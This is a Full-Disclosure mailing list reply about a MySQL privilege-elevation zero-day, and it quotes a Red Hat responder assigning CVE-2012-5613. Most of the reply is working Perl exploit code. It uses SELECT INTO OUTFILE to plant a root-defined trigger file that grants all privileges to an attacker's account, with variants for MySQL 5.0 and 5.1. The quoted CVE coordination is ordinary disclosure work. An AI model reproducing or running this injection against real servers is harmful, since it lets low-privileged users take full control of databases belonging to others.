[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] MySQL (Linux) Database Privilege Elevation Zeroday Exploit



Maybe read the code???

$mysql_version = "51"; # can be 51 or 50

if ($mysql_version eq "50") {
$inject =
"select 'TYPE=TRIGGERS' into outfile'".$folder.$database."/rootme.TRG'
LINES TERMINATED BY '\\ntriggers=\\'CREATE DEFINER=`root`\@`localhost`
trigger atk after insert on rootme for each row\\\\nbegin \\\\nUPDATE
mysql.user SET Select_priv=\\\\\\'Y\\\\\\', Insert_priv=\\\\\\'Y\\\\\\',
Update_priv=\\\\\\'Y\\\\\\', Delete_priv=\\\\\\'Y\\\\\\',
Create_priv=\\\\\\'Y\\\\\\', Drop_priv=\\\\\\'Y\\\\\\',
Reload_priv=\\\\\\'Y\\\\\\', Shutdown_priv=\\\\\\'Y\\\\\\',
Process_priv=\\\\\\'Y\\\\\\', File_priv=\\\\\\'Y\\\\\\',
Grant_priv=\\\\\\'Y\\\\\\', References_priv=\\\\\\'Y\\\\\\',
Index_priv=\\\\\\'Y\\\\\\', Alter_priv=\\\\\\'Y\\\\\\',
Show_db_priv=\\\\\\'Y\\\\\\', Super_priv=\\\\\\'Y\\\\\\',
Create_tmp_table_priv=\\\\\\'Y\\\\\\', Lock_tables_priv=\\\\\\'Y\\\\\\',
Execute_priv=\\\\\\'Y\\\\\\', Repl_slave_priv=\\\\\\'Y\\\\\\',
Repl_client_priv=\\\\\\'Y\\\\\\', Create_view_priv=\\\\\\'Y\\\\\\',
Show_view_priv=\\\\\\'Y\\\\\\', Create_routine_priv=\\\\\\'Y\\\\\\',
Alter_routine_priv=\\\\\\'Y\\\\\\', Create_user_priv=\\\\\\'Y\\\\\\',
ssl_type=\\\\\\'Y\\\\\\', ssl_cipher=\\\\\\'Y\\\\\\',
x509_issuer=\\\\\\'Y\\\\\\', x509_subject=\\\\\\'Y\\\\\\',
max_questions=\\\\\\'Y\\\\\\', max_updates=\\\\\\'Y\\\\\\',
max_connections=\\\\\\'Y\\\\\\' WHERE
User=\\\\\\'$user\\\\\\';\\\\nend\\'\\nsql_modes=0\\ndefiners=\\'root\@localhost\\'\\nclient_cs_names=\\'latin1\\'\\nconnection_cl_names=\\'latin1_swedish_ci\\'\\ndb_cl_names=\\'latin1_swedish_ci\\'\\n';";
} else {
$inject =
"select 'TYPE=TRIGGERS' into outfile'".$folder.$database."/rootme.TRG'
LINES TERMINATED BY '\\ntriggers=\\'CREATE DEFINER=`root`\@`localhost`
trigger atk after insert on rootme for each row\\\\nbegin \\\\nUPDATE
mysql.user SET Select_priv=\\\\\\'Y\\\\\\', Insert_priv=\\\\\\'Y\\\\\\',
Update_priv=\\\\\\'Y\\\\\\', Delete_priv=\\\\\\'Y\\\\\\',
Create_priv=\\\\\\'Y\\\\\\', Drop_priv=\\\\\\'Y\\\\\\',
Reload_priv=\\\\\\'Y\\\\\\', Shutdown_priv=\\\\\\'Y\\\\\\',
Process_priv=\\\\\\'Y\\\\\\', File_priv=\\\\\\'Y\\\\\\',
Grant_priv=\\\\\\'Y\\\\\\', References_priv=\\\\\\'Y\\\\\\',
Index_priv=\\\\\\'Y\\\\\\', Alter_priv=\\\\\\'Y\\\\\\',
Show_db_priv=\\\\\\'Y\\\\\\', Super_priv=\\\\\\'Y\\\\\\',
Create_tmp_table_priv=\\\\\\'Y\\\\\\', Lock_tables_priv=\\\\\\'Y\\\\\\',
Execute_priv=\\\\\\'Y\\\\\\', Repl_slave_priv=\\\\\\'Y\\\\\\',
Repl_client_priv=\\\\\\'Y\\\\\\', Create_view_priv=\\\\\\'Y\\\\\\',
Show_view_priv=\\\\\\'Y\\\\\\', Create_routine_priv=\\\\\\'Y\\\\\\',
Alter_routine_priv=\\\\\\'Y\\\\\\', Create_user_priv=\\\\\\'Y\\\\\\',
Event_priv=\\\\\\'Y\\\\\\', Trigger_priv=\\\\\\'Y\\\\\\',
ssl_type=\\\\\\'Y\\\\\\', ssl_cipher=\\\\\\'Y\\\\\\',
x509_issuer=\\\\\\'Y\\\\\\', x509_subject=\\\\\\'Y\\\\\\',
max_questions=\\\\\\'Y\\\\\\', max_updates=\\\\\\'Y\\\\\\',
max_connections=\\\\\\'Y\\\\\\' WHERE
User=\\\\\\'$user\\\\\\';\\\\nend\\'\\nsql_modes=0\\ndefiners=\\'root\@localhost\\'\\nclient_cs_names=\\'latin1\\'\\nconnection_cl_names=\\'latin1_swedish_ci\\'\\ndb_cl_names=\\'latin1_swedish_ci\\'\\n';";
}

On Sun, Dec 2, 2012 at 12:12 AM, Kurt Seifried <kseifried@xxxxxxxxxx> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On 12/01/2012 02:26 PM, king cope wrote:
> > (see attachment)
> >
> > Cheerio,
> >
> > Kingcope
>
> So normally for MySQL issues Oracle would assign the CVE #. However in
> this case we have a bit of a time constraint (it's a weekend and this
> is blowing up quickly)  and the impacts are potentially quite severe.
> So I've spoken with some other Red Hat SRT members and we feel it is
> best to get CVE #'s assigned for these issues quickly so we can refer
> to them properly.
>
> If Oracle security has already assigned CVE's for these please let us
> and the public know so we can use the correct numbers. Also if Oracle
> can let the public know which versions of MySQL are affected (e.g.
> 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am
> sure.
>
> I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey,
> cve-assign and OSVDB to the CC so that everyone is aware of what is
> going on.
>
> Please use CVE-2012-5613 for MySQL (Linux) Database Privilege
> Elevation Zeroday Exploit
>
> - --
> Kurt Seifried Red Hat Security Response Team (SRT)
> PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.12 (GNU/Linux)
>
> iQIcBAEBAgAGBQJQuvFXAAoJEBYNRVNeJnmTmIIP/ibqLe92YFPGEYCJbAReXjOl
> GrtUPHhqJ6d1vQ01UFMDhPwqAhdOq5mGH+FBrt6aaDyQZQijRzmQVtaneRe+c4o1
> 5txCdF3X/SwGv7MIBbBMCHztZynkDNQ/a68JIkNjJ7hWuE5carmhogYtzoNmhUxF
> n3k11HUsNTcMwgN/RUCjab4tKKTn1HlJB8M+KL+v36DM3M7UCjErUk/upVeJoaK7
> 7ATANDzlURc9W/YfcDNWZIhzPL3AMF4+4oLc9Qc2TMqjKn+WzLCgfGV9sBSujImk
> dod1bbKZ7efDPYP48EsYW34xg/jc6bw4RW3YaxypeQ23G/QSgnRzunJJu4LeCycw
> 7Sg7b+Sy8FRxGjhztf4hSCXvn6Hplnlt+uzrvjL6YVFt1MwGVIgiRN/0WoiFp/HH
> Su6uodLiA1M0QrTCYYrTe5G8aZ4DAuHbkmWetm7BrTwXyqfqXVtENBgLPWp5JOuS
> WpFpMFbLqe8tm+x+UqaCTRoBhahovwURkM2+micSdiXmRW9KSOH+2sAj0ewcPL4V
> rpLrrDym7nnvCRa6R5pxeC8aN0nayWbPyR1VUULLfg5vKLH9/lgnA5NahLAcI228
> kMgXDlAUOQo86sE7sBE+5dmu3qYKdKMiy174odz/MbnHdWpIV1j9zeVPbfTqHFG+
> OyZokNeRbwFhefCGhH3g
> =lO/R
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/